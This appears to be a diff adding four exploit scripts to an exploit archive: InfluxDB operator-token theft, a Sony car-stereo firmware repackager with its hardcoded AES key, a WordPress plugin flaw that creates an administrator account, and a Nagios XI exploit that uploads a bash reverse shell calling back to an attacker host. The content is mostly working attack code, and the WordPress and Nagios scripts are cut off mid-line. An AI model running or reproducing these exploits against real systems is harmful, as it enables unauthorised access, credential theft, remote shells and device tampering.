diff --git a/exploits/multiple/remote/52142.py b/exploits/multiple/remote/52142.py
new file mode 100755
index 000000000..23572c7b1
--- /dev/null
+++ b/exploits/multiple/remote/52142.py
@@ -0,0 +1,221 @@
+# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
+# Date: 22/03/2024
+# Exploit Author: Andrea Pasin (Xenom0rph97)
+# Researcher Homepage: https://xenom0rph97.github.io/xeno/
+# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
+# Software Link: https://www.influxdata.com/products/influxdb/
+# Version: 2.x <=> 2.7.11
+# Tested on: InfluxDB OSS 2.x
+# CVE: CVE-2024-30896
+# CVSS Base Score: 9.1
+# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+
+# CVE-2024-30896
+
+## Summary
+A business logic flaw in influxdb allows users who own a valid allAccess
+token to escalate their privileges at operator level by listing current
+authorization tokens.
+
+## Scenario
+Attacker might be a user which was gained access by an administrator via an
+allAccess token only within their organization.
+This user's permissions will allow full control over the organization but
+will still prevent him to interact with other orgs.
+
+## Impact
+This vulnerability would allow a user to obtain unrestricted access to the
+influxdb instance. A similar condition might fully compromise
+Confidentiality, Integrity and Availability of data owned by users of
+different organizations. Additionally, since operator token has
+administrative permissions, Availability and Integrity of the entire
+influxdb instance might be compromised.
+
+## Prerequisites/Limitations
+1. Attacker must have a valid allAccess token
+2. allAccess token must have been created in the same Org where an operator
+token resides (ex. same Org as Admin user)
+3. Attacker must be able to interact with influxdb instance via CLI or APIs
+(influxClient)
+
+## Steps to Reproduce
+### Case 1: Exploitation via influxdb APIs:
+*Python Version*: 3
+*Requirements*: `influxdb_client==1.41.0`
+*Script usage*
+```
+% python3 ./CVE-2024-30896.py -h
+usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
+[-vv [VVERBOSE]]
+
+optional arguments:
+-h, --help show this help message and exit
+-t TOKEN, --token TOKEN
+Custom or allAccess token to access influx DB
+instance
+-e ENDPOINTURL, --endpointUrl ENDPOINTURL
+Endpoint Url of influxdb instance (ex. "
+https://myInfluxdbInstance:8086/")
+-v [VERBOSE], --verbose [VERBOSE]
+Enable verbose logging - INFO
+-vv [VVERBOSE], --vverbose [VVERBOSE]
+Enable verbose logging - DEBUG
+```
+
+### Case 2: Exploitation via influx CLI
+1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This
+will list all current active operator tokens on the influxdb instance.
+
+*Example*
+```
+# Using an allAccess token
+influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
+
+0cc41c3b050e5000 U1OuqmFC{REDACTED}
+admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations
+write:orgs/87d0746948a3b3f5/authorizations
+read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets
+read:orgs/87d0746948a3b3f5/dashboards
+write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5
+read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources
+read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks
+read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs
+read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000
+read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables
+read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers
+read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets
+read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels
+read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views
+read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents
+read:orgs/87d0746948a3b3f5/notificationRules
+write:orgs/87d0746948a3b3f5/notificationRules
+read:orgs/87d0746948a3b3f5/notificationEndpoints
+write:orgs/87d0746948a3b3f5/notificationEndpoints
+read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks
+read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp
+read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks
+read:orgs/87d0746948a3b3f5/annotations
+write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes
+write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications
+write:orgs/87d0746948a3b3f5/replications]
+
+# Listing all available tokens passing allAccess token and retrieving only
+operator level tokens
+influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
+
+0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
+admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations
+read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs
+write:/orgs read:/sources write:/sources read:/tasks write:/tasks
+read:/telegrafs write:/telegrafs read:/users write:/users read:/variables
+write:/variables read:/scrapers write:/scrapers read:/secrets
+write:/secrets read:/labels write:/labels read:/views write:/views
+read:/documents write:/documents read:/notificationRules
+write:/notificationRules read:/notificationEndpoints
+write:/notificationEndpoints read:/checks write:/checks read:/dbrp
+write:/dbrp read:/notebooks write:/notebooks read:/annotations
+write:/annotations read:/remotes write:/remotes read:/replications
+write:/replications]
+
+influxdb_client==1.41.0
+
+import influxdb_client
+import argparse
+import logging
+import sys
+
+argParser = argparse.ArgumentParser()
+argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
+argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
+argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
+argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")
+
+args = argParser.parse_args()
+
+# Using user retrieved values or default (hardcoded) ones
+all_access_token = "<allAccessToken>"
+influx_endpoint_url = "<influxdbEndpointUrl>"
+
+# Defining some colors
+red = "\033[31m"
+yellow = "\033[93m"
+purple = "\33[1;95m"
+green = "\033[0;92m"
+cyan = "\033[96m"
+bold ="\033[1m"
+endc = "\033[39m"
+
+if args.vverbose == True:
+    logging.basicConfig(level=logging.DEBUG)
+elif args.verbose == True:
+    logging.basicConfig(level=logging.INFO)
+
+logger = logging.getLogger()
+
+if args.token:
+    token = args.token
+else:
+    logger.debug(f"{yellow}User did not set a token, using default one{endc}")
+    token = all_access_token
+
+if args.endpointUrl:
+    endpointUrl = args.endpointUrl
+else:
+    logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
+    endpointUrl = influx_endpoint_url
+
+logger.info(f"{cyan}Connecting to influx DB instance{endc}")
+# Connecting to influxdb instance
+try:
+    conn = influxdb_client.InfluxDBClient(
+                url=endpointUrl,
+                token=token,
+                debug=False,
+                verify_ssl=True
+            )
+
+    # Verify InfluxDB connection
+    health = conn.ping()
+    if not health:
+        logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}")
+        print(f"{red}Quitting execution...{endc}")
+        sys.exit(1)
+
+except Exception as e:
+    logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
+    print(f"{red}Quitting execution...{endc}")
+    sys.exit(1)
+
+# Retrieving all current auths
+logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
+print(f"{cyan}Enumerating current authorizations...{endc}")
+try:
+    auths = conn.authorizations_api().find_authorizations()
+except Exception as e:
+    logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}")
+    print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
+    sys.exit(1)
+if not auths:
+    print(f"{cyan}No Authorization tokens found on the instance{endc}")
+    sys.exit(1)
+print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")
+# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
+logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
+print(f"{cyan}Enumerating all operator tokens:{endc}")
+op_tokens = []
+# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access
+try:
+    for auth in auths:
+        if auth.permissions:
+            for perm in auth.permissions:
+                if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
+                    op_tokens.append(auth.token)
+except Exception as e:
+    logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
+    print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
+    sys.exit(1)
+
+logger.info(f"{cyan}Printing all operator auth tokens{endc}")
+print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
+for op_t in op_tokens:
+    print(f"{green}{op_t}{endc}")
\ No newline at end of file
diff --git a/exploits/multiple/remote/52143.py b/exploits/multiple/remote/52143.py
new file mode 100755
index 000000000..0997940b3
--- /dev/null
+++ b/exploits/multiple/remote/52143.py
@@ -0,0 +1,355 @@
+# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
+# Date: 11-Feb-2025
+# Exploit Author: lkushinada
+# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
+# Software Link: https://archive.org/details/xav-ax-5500-v-113
+# Version: 1.13
+# Tested on: Sony XAV-AX5500
+# CVE : CVE-2024-23922
+
+# From NIST CVE Details:
+# ====
+# This vulnerability allows physically present attackers to execute arbitrary code on affected
+# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
+# vulnerability. The specific flaw exists within the handling of software updates. The issue
+# results from the lack of proper validation of software update packages. An attacker can leverage
+# this vulnerability to execute code in the context of the device.
+# Was ZDI-CAN-22939
+# ====
+
+# # Summary
+# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
+# obscurity of their package format, and a weird checksum method instead of any real firmware
+# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
+# and allow a USB-based attacker to obtain RCE on the infotainment unit.
+
+# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
+# infotainment units and products which use a similar chipset or firmware package format. Tested
+# to work on most firmware versions prior to v2.00.
+
+# # Threat Model
+# An attacker with physical access to an automotive media unit can typically utilize other methods
+# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
+# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
+# manner? if they are, how trivial is it to bypass?
+
+# # Disclaimer
+# The information in this article is for educational purposes only.
+# Tampering with an automotive system comes with risks which, if you don't understand, you should
+# not be undertaking.
+# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
+# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
+
+
+# # The Unit
+# ## Processors
+#  - DAC
+#  - System Management Controller (SMC)
+#  - Applications Processor
+#  - Display Processor
+
+# Coming from a mobile and desktop computer environment, one may be use to thinking about
+# the Applications Processor as the most powerful chip in the system in terms of processing power,
+# size, power consumption, and system hierarchy. The first oddity of this platform is that the
+# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
+# board.
+
+# The application processor does not appear to be the orchestrator of the components on the system.
+# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
+# controls, steering wheel button presses) routing.
+# For our purposes, it is the Applications processor we're interested in, as it is
+# the system responsible for updating the unit via USB.
+
+# ## Interfaces
+# We're going to be attacking the unit via USB, as it's the most readily exposed
+# interface to owners and would-be attackers.
+# Whilst the applications processor does have a UART interface, the most recent iterations of the
+# unit do not expose any headers for debugging via UART, and the one active UART line found to be
+# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
+# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
+# documentation suggests these are not enabled, but this could not be verified during testing. At the
+# very least, JTAG was not found to be exposed on an accessible interface.
+
+# ## Storage
+# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
+# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
+# discussed in this report.
+
+# ## The Updater
+# Updates are provided on Sony's support website. A ZIP package is provided with three files:
+#  - SHDS1132.up6
+#  - SHMC1132.u88
+#  - SHSO1132.fir
+# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
+# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
+# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
+
+# 00002070  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
+# *
+# 00002860  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
+
+# 00744110  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
+# *
+# 00800020  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
+
+
+# ## SPI Flash
+# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
+# 00001fe0  10 10 10 10 10 10 10 10  ff ff ff ff ff ff ff ff  |................|
+# 00001ff0  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
+# *
+# 000027f0  ff ff ff ff ff ff ff ff  ff ff ff ff 00 03 e7 52  |...............R|
+# 00002800  52 61 72 21 1a 07 00 cf  90 73 00 00 0d 00 00 00  |Rar!.....s......|
+#
+# 0007fff0  ff ff ff ff ff ff ff ff  ff ff ff ff 00 6c 40 8b  |.............l@.|
+# 00080000  52 61 72 21 1a 07 00 cf  90 73 00 00 0d 00 00 00  |Rar!.....s......|
+# ...
+# 00744090  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
+# *
+# 00778000
+#
+# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
+# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.
+
+# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
+# us a strong indication the encryption function is operating in an ECB-style configuration,
+# giving us an avenue, even if we do not recover the key, to potentially make modifications
+# to the firmware depending on how the checksum is being calculated.
+
+# ## Firmware
+# The recovery application contains the decompression, decryption and checksum methods.
+# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
+# we start taking a look at the relevant functions by way of:
+# - looking for known strings (KRSELCO)
+# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
+# - looking for things that look like encryption (loads of bitshifting math in one function)
+# Of interest to us, there is:
+# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
+# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
+# - 0x02d4ce - the AES decryption function
+# - 0x040dd4 - strcmp (?)
+# - 0x040aa4 - memcpy (?)
+# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
+#              padding zeros to get us to a 16 byte key
+
+# This gives us all the information we need, other than making some guesses as to the general package
+# and header layout of the update package, to craft an update packager that allows arbitrary
+# modification of the firmware.
+
+# # Proof of Concept
+# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
+# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
+# the update.
+
+# ## Requirements
+# - Unixish system
+# - WinRar 2.0 (the version the Egyptians built the pyramids with)
+
+# ## Usage
+# cve-2024-23922.py path_to_winrar source.fir output.fir
+
+import argparse
+import sys
+import os
+import tempfile
+import shutil
+from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
+from cryptography.hazmat.backends import default_backend
+
+# Filenames as found in the .FIR
+MAIN_BINARY_NAME="main_16.bin"
+MAIN_RAR_NAME="main_16.rar"
+DECRYPTED_FILE_NAME="decrypt.bin"
+ENCRYPTED_FILE_NAME="encrypt.bin"
+
+# Offsets in the .FIR
+HEADER_LENGTH=0x80
+RECOVERY_OFFSET=0x2800
+MAIN_OFFSET=0x80000
+CHECKSUM_OFFSET=0x800000-0x10
+CHECKSUM_SIZE=0x4
+RAR_LENGTH_OFFSET=0x4
+RAR_LENGTH_SIZE=0x4
+
+# From 0x46490 in recovery_16.bin
+ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'
+
+def decrypt_file(input_file, output_file):
+    backend = default_backend()
+    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
+    decryptor = cipher.decryptor()
+
+    with open(input_file, 'rb') as file:
+        ciphertext = file.read()
+
+    # Strip the unencrypted header
+    ciphertext = ciphertext[HEADER_LENGTH:]
+
+    decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
+
+    with open(output_file, 'wb') as file:
+        file.write(decrypted_data)
+
+def aes_encrypt_file(input_file, output_file):
+    backend = default_backend()
+    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
+    encryptor = cipher.encryptor()
+
+    with open(input_file, 'rb') as file:
+        plaintext = file.read()
+
+    ciphertext = encryptor.update(plaintext) + encryptor.finalize()
+
+    with open(output_file, 'wb') as file:
+        file.write(ciphertext)
+
+def get_sony_32(data):
+    csum = int()
+    for i in data:
+        csum = csum + i
+    return csum % 2147483648 # 2^31
+
+def validate_args(winrar_path, source_file, destination_file):
+    # Check if the WinRAR executable exists and is a file
+    if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
+        print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
+        sys.exit(1)
+
+    # Check if the source file exists
+    if not os.path.isfile(source_file):
+        print(f"[x] Error: The specified source file '{source_file}' does not exist.")
+        sys.exit(1)
+
+    # Read 8 bytes from offset 0x10 in the source file
+    try:
+        with open(source_file, 'rb') as f:
+            f.seek(0x10)
+            signature = f.read(8)
+            if signature != b'KRSELECO':
+                print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
+                sys.exit(1)
+    except Exception as e:
+        print(f"[x] Error: Failed to read from '{source_file}': {e}")
+        sys.exit(1)
+
+    # Check if the destination file already exists
+    if os.path.exists(destination_file):
+        print(f"[x] Error: The destination file '{destination_file}' already exists.")
+        sys.exit(1)
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
+    parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
+    parser.add_argument("source_file", help="Path to original .FIR file")
+    parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
+
+    args = parser.parse_args()
+
+    validate_args(args.winrar_path, args.source_file, args.destination_file)
+    RAR_2_PATH = args.winrar_path
+    GOOD_FIRMWARE_FILE = args.source_file
+    DESTINATION_FIRMWARE_FILE = args.destination_file
+
+    # make temporary directory
+    workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
+
+    # copy the good firmware file into the temp directory
+    temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
+    shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)
+
+    print("[+] Cutting the head off and decrypting the contents")
+    decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
+    decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)
+
+    print("[+] Dump out the rar file")
+    with open(decrypted_file_path, 'rb') as file:
+        # right before the rar file there is a 4 byte length header for the rar file. get that.
+        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
+        original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
+        rar_file_bytes = file.read(original_rar_length)
+
+        # now dump that out
+        rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
+        with open(rar_file_path, 'wb') as rarfile:
+            rarfile.write(rar_file_bytes)
+
+    # check that the stat of the file matches what the header told us
+    dumped_rar_size = os.stat(rar_file_path).st_size
+    if dumped_rar_size != original_rar_length:
+        print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)
+
+    print("[+] Extracting the main binary from the rar file")
+    os.system("unrar x " + rar_file_path + " " + workdir)
+
+    print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
+    print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
+    input()
+
+    print("[+] Continuing")
+    print("[+] Putting your main binary back into the rar file")
+    os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
+
+    # we could fix this by writing some FFs
+    new_rar_size=os.stat(rar_file_path).st_size
+    if dumped_rar_size > os.stat(rar_file_path).st_size:
+        print("[!!] The rar size is smaller than the old one. This might cause a problem.")
+        print("[!!] Push any key to continue, ctrl+c to abort")
+        input()
+
+    with open(decrypted_file_path, 'r+b') as file:
+        # right before the rar file there is a 4 byte length header for the rar file. go back there
+        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
+
+        # overwrite the old size with the new size
+        file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
+
+        print("[+] Deleting the old rar from the main container")
+        # delete the old rar from the main container by FFing it up
+        file.write(b'\xFF'*original_rar_length)
+
+        # seek back to the start
+        file.seek(MAIN_OFFSET)
+
+        print("[+] Loading the new rar back into the main container")
+        with open(rar_file_path, 'rb') as rarfile:
+            new_rarfile_bytes = rarfile.read()
+            file.write(new_rarfile_bytes)
+
+    print("[+] Updating Checksum")
+    with open(decrypted_file_path, 'rb') as file:
+        contents = file.read()
+
+    contents = contents[:-0x0010]
+    s32_sum = get_sony_32(contents)
+
+    with open(decrypted_file_path, 'r+b') as file:
+        file.seek(CHECKSUM_OFFSET)
+        # read out the current checksum
+        old_checksum_bytes=file.read(CHECKSUM_SIZE)
+        print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
+
+        # go back and update it with new checksum
+        print("new checksum:", s32_sum, hex(s32_sum))
+        new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
+        file.seek(CHECKSUM_OFFSET)
+        file.write(new_checksum_bytes)
+
+    print("[+] Encrypting the main container back up")
+    encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
+    aes_encrypt_file(decrypted_file_path, encrypted_file_path)
+
+    print("[+] Reattaching the main container to the header and writing to dest")
+    with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
+        with open(temp_fir_file, 'rb') as firfile:
+            header = firfile.read(HEADER_LENGTH)
+        file.write(header)
+        with open(encrypted_file_path, 'rb') as encfile:
+            enc_contents = encfile.read()
+        file.write(enc_contents)
+
+    print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
+    input()
+    shutil.rmtree(workdir)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52137.txt b/exploits/multiple/webapps/52137.txt
new file mode 100644
index 000000000..ce124982e
--- /dev/null
+++ b/exploits/multiple/webapps/52137.txt
@@ -0,0 +1,126 @@
+# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
+# Exploit Author: Al Baradi Joy
+# Date: 2025-04-07
+# Vendor Homepage: https://wordpress.org/plugins/user-registration/
+# Software Link:
+https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
+# Version: <= 4.1.1
+# Tested on: WordPress 6.4.3
+# CVSS: 9.8 (CRITICAL)
+# CWE: CWE-269
+# References:
+# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
+# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
+# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
+
+import re
+import json
+import requests
+import random
+import string
+from urllib.parse import urljoin
+
+def banner():
+print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
+print("[+] Made By Al Baradi Joy\n")
+
+def randstring(n=8):
+return ''.join(random.choices(string.ascii_lowercase, k=n))
+
+def get_regex(content, pattern, group=1, name=""):
+match = re.search(pattern, content)
+if not match:
+raise ValueError(f"[-] Could not extract {name} (Pattern:
+{pattern})")
+return match.group(group)
+
+def exploit(target):
+session = requests.Session()
+username = randstring()
+password = randstring() + "!@"
+email = f"{username}@exploit.test"
+
+try:
+print("[+] Getting registration page...")
+r = session.get(urljoin(target, "/membership-registration/"),
+timeout=10)
+r.raise_for_status()
+page = r.text
+
+nonce = get_regex(page,
+r'"user_registration_form_data_save":"(.*?)"', name="nonce")
+formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
+name="formid")
+memval = get_regex(page,
+r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
+memname = get_regex(page,
+r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
+front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
+value="(.*?)"', name="frontend_nonce")
+loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
+= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
+
+print("[+] Submitting registration form...")
+form_data = [
+{"field_name": "user_login", "value": username, "field_type":
+"text", "label": "Username"},
+{"field_name": "user_email", "value": email, "field_type":
+"email", "label": "User Email"},
+{"field_name": "user_pass", "value": password, "field_type":
+"password", "label": "User Password"},
+{"field_name": "user_confirm_password", "value": password,
+"field_type": "password", "label": "Confirm Password"},
+{"value": memval, "field_type": "radio", "label": "membership",
+"field_name": f"membership_field_{memname}"}
+]
+
+payload = {
+"action": "user_registration_user_form_submit",
+"security": nonce,
+"form_data": json.dumps(form_data),
+"form_id": formid,
+"registration_language": "en-US",
+"ur_frontend_form_nonce": front_nonce,
+"is_membership_active": memval,
+"membership_type": memval
+}
+
+r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
+data=payload, timeout=10)
+
+if '"success":true' not in r2.text:
+print("[-] Registration form failed.")
+return
+
+print("[+] Sending membership registration as administrator...")
+member_payload = {
+"action": "user_registration_membership_register_member",
+"security": loc_nonce,
+"members_data": json.dumps({
+"membership": "1",
+"payment_method": "free",
+"start_date": "2025-3-29",
+"username": username,
+"role": "administrator"
+})
+}
+
+r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
+data=member_payload, timeout=10)
+
+if '"success":true' in r3.text:
+print("[+] Exploit Successful!")
+print(f"[+] Admin Username: {username}")
+print(f"[+] Admin Password: {password}")
+else:
+print("[-] Membership escalation failed.")
+
+except Exception as e:
+print(f"[-] Exploit failed: {str(e)}")
+
+if __name__ == "__main__":
+banner()
+target = input("Enter target WordPress site (e.g., http://example.com):
+").strip().rstrip('/')
+if not target.startswith("http"):
+target = "http:
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52138.txt b/exploits/multiple/webapps/52138.txt
new file mode 100644
index 000000000..4258e1d70
--- /dev/null
+++ b/exploits/multiple/webapps/52138.txt
@@ -0,0 +1,90 @@
+# Exploit Title: Nagiosxi authenticated Remote Code Execution
+# Date: 17/02/2024
+# Exploit Author: Calil Khalil
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Version: Nagios Xi 5.6.6
+# Tested on: Ubuntu
+# CVE : CVE-2019-15949
+
+#
+# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
+#
+
+import argparse
+import re
+import requests
+import urllib3
+
+class Nagiosxi():
+    def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
+        self.url = target
+        self.parameter = parameter
+        self.username = username
+        self.password = password
+        self.lhost = lhost
+        self.lport = lport
+        self.ignore_ssl = ignore_ssl
+        self.login()
+
+    def upload(self, session):
+        print("Uploading Malicious Check Ping Plugin")
+        upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
+        upload_token = session.get(upload_url, verify=not self.ignore_ssl)
+        nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
+        print("Upload NSP Token: " + nsp[0])
+        payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
+        file_data = {
+                "upload": "1",
+                "nsp": nsp[0],
+                "MAX_FILE_SIZE": "20000000"
+                }
+        file_upload = {
+                "uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
+                }
+        session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
+        payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
+        session.get(payload_url, verify=not self.ignore_ssl)
+
+    def login(self):
+        session = requests.Session()
+        login_url = self.url + self.parameter + "/login.php"
+        token = session.get(login_url, verify=not self.ignore_ssl)
+        nsp = re.findall('name="nsp" value="(.*)">', token.text)
+        print("Login NSP Token: " + nsp[0])
+        post_data = {
+                "nsp": nsp[0],
+                "page": "auth",
+                "debug": "",
+                "pageopt": "login",
+                "redirect": "",
+                "username": self.username,
+                "password": self.password,
+                "loginButton": ""
+        }
+        login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
+        if "Home Dashboard" in login.text:
+            print("Logged in!")
+        else:
+            print("Unable to login!")
+        self.upload(session)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution')
+    parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
+    parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
+    parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
+    parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
